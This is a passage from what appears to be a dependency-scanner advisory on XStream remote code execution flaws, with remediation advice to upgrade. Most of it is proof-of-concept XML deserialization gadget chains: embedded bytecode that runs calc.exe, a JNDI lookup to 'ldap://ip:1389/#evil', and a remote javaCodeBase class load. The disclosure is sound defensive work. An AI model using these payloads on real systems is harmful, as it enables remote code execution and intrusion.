<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</bean>
<localCache>
<methods>
<entry>
<string>getOutputProperties</string>
<list>
<method>
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
<name>getOutputProperties</name>
<parameter-types/>
</method>
</list>
</entry>
</methods>
</localCache>
</attrIndexTable>
<shortCodeHeader__h__limit>0</shortCodeHeader__h__limit>
</outer-class>
</comparator>
</default>
<int>3</int>
<string-array>
<string>yxxx</string>
<string>outputProperties</string>
</string-array>
<string-array>
<string>yxxx</string>
</string-array>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
<owner/>
<managedObjectManagerClosed>false</managedObjectManagerClosed>
<databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
<stubHandlers>
<entry>
<method>
<class>java.lang.Comparable</class>
<name>compareTo</name>
<parameter-types>
<class>java.lang.Object</class>
</parameter-types>
</method>
<com.sun.xml.internal.ws.client.sei.StubHandler>
<bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
<indices>
<int>0</int>
</indices>
<getters>
<com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
</getters>
<accessors>
<com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
<val_-isJAXBElement>false</val_-isJAXBElement>
<val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
<type>int</type>
<field>
<name>hash</name>
<clazz>java.lang.String</clazz>
</field>
</val_-getter>
<val_-isListType>false</val_-isListType>
<val_-n>
<namespaceURI/>
<localPart>hash</localPart>
<prefix/>
</val_-n>
<val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
<type>java.lang.String</type>
<method>
<class>javax.naming.InitialContext</class>
<name>doLookup</name>
<parameter-types>
<class>java.lang.String</class>
</parameter-types>
</method>
</val_-setter>
<outer-class>
<propertySetters>
<entry>
<string>serialPersistentFields</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>[Ljava.io.ObjectStreamField;</type>
<field>
<name>serialPersistentFields</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>CASE_INSENSITIVE_ORDER</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>java.util.Comparator</type>
<field>
<name>CASE_INSENSITIVE_ORDER</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>serialVersionUID</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>long</type>
<field>
<name>serialVersionUID</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>value</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>[C</type>
<field>
<name>value</name>
<clazz>java.lang.String</clazz>
</field>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
<entry>
<string>hash</string>
<com.sun.xml.internal.ws.spi.db.FieldSetter>
<type>int</type>
<field reference='../../../../../val_-getter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldSetter>
</entry>
</propertySetters>
<propertyGetters>
<entry>
<string>serialPersistentFields</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>[Ljava.io.ObjectStreamField;</type>
<field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>CASE_INSENSITIVE_ORDER</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>java.util.Comparator</type>
<field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>serialVersionUID</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>long</type>
<field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>value</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter>
<type>[C</type>
<field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
</com.sun.xml.internal.ws.spi.db.FieldGetter>
</entry>
<entry>
<string>hash</string>
<com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
</entry>
</propertyGetters>
<elementLocalNameCollision>false</elementLocalNameCollision>
<contentClass>java.lang.String</contentClass>
<elementDeclaredTypes/>
</outer-class>
</com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
</accessors>
<wrapper>java.lang.Object</wrapper>
<bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
<dynamicWrapper>false</dynamicWrapper>
</bodyBuilder>
<isOneWay>false</isOneWay>
</com.sun.xml.internal.ws.client.sei.StubHandler>
</entry>
</stubHandlers>
<clientConfig>false</clientConfig>
</databinding>
<methodHandlers>
<entry>
<method reference='../../../databinding/stubHandlers/entry/method'/>
<com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
<owner reference='../../../..'/>
<method reference='../../../../databinding/stubHandlers/entry/method'/>
<isVoid>false</isVoid>
<isOneway>false</isOneway>
</com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
</entry>
</methodHandlers>
</handler>
</dynamic-proxy>
<string>ldap://ip:1389/#evil</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. A user is only affected if using the version out of the box with JDK 1.7u21 or below. However, this scenario can be adjusted easily to an external Xalan that works regardless of the version of the Java runtime. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<linked-hash-set>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization='custom'>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVyNDE2NTkyOTE1MTgwNjAwAQAgTHlzb3NlcmlhbC9Qd25lcjQxNjU5MjkxNTE4MDYwMDsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<dynamic-proxy>
<interface>javax.xml.transform.Templates</interface>
<handler class='sun.reflect.annotation.AnnotationInvocationHandler' serialization='custom'>
<sun.reflect.annotation.AnnotationInvocationHandler>
<default>
<memberValues>
<entry>
<string>f5a5a608</string>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference='../../../../../../../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'/>
</entry>
</memberValues>
<type>javax.xml.transform.Templates</type>
</default>
</sun.reflect.annotation.AnnotationInvocationHandler>
</handler>
</dynamic-proxy>
</linked-hash-set>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<javax.swing.event.EventListenerList serialization='custom'>
<javax.swing.event.EventListenerList>
<default>
<listenerList>
<javax.swing.undo.UndoManager>
<hasBeenDone>true</hasBeenDone>
<alive>true</alive>
<inProgress>true</inProgress>
<edits>
<com.sun.xml.internal.ws.api.message.Packet>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
<cleaned>false</cleaned>
<entries>
<com.sun.jndi.ldap.LdapEntry>
<DN>cn=four,cn=three,cn=two,cn=one</DN>
<attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ignoreCase>false</ignoreCase>
</default>
<int>4</int>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>objectClass</attrID>
</default>
<int>1</int>
<string>javanamingreference</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default>
<rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'>
<com.sun.jndi.ldap.LdapName>
<string>cn=four,cn=three,cn=two,cn=one</string>
<boolean>false</boolean>
</com.sun.jndi.ldap.LdapName>
</rdn>
</default>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaCodeBase</attrID>
</default>
<int>1</int>
<string>http://127.0.0.1:8080/</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default/>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaClassName</attrID>
</default>
<int>1</int>
<string>refObj</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default/>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaFactory</attrID>
</default>
<int>1</int>
<string>ExecTemplateJDK7</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default/>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
</javax.naming.directory.BasicAttribute>
</attributes>
</com.sun.jndi.ldap.LdapEntry>
</entries>
<limit>2</limit>
<posn>0</posn>
<homeCtx/>
<more>true</more>
<hasMoreCalled>true</hasMoreCalled>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</com.sun.xml.internal.ws.api.message.Packet>
</edits>
<indexOfNextAdd>0</indexOfNextAdd>
<limit>100</limit>
</javax.swing.undo.UndoManager>
</listenerList>
</default>
<string>java.lang.InternalError</string>
<javax.swing.undo.UndoManager reference='../default/listenerList/javax.swing.undo.UndoManager'/>
<null/>
</javax.swing.event.EventListenerList>
</javax.swing.event.EventListenerList>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>test</type>
<value class='javax.swing.MultiUIDefaults' serialization='custom'>
<unserializable-parents/>
<hashtable>
<default>
<loadFactor>0.75</loadFactor>
<threshold>525</threshold>
</default>
<int>700</int>
<int>0</int>
</hashtable>
<javax.swing.UIDefaults>
<default>
<defaultLocale>zh_CN</defaultLocale>
<resourceCache/>
</default>
</javax.swing.UIDefaults>
<javax.swing.MultiUIDefaults>
<default>
<tables>
<javax.swing.UIDefaults serialization='custom'>
<unserializable-parents/>
<hashtable>
<default>
<loadFactor>0.75</loadFactor>
<threshold>525</threshold>
</default>
<int>700</int>
<int>1</int>
<string>lazyValue</string>
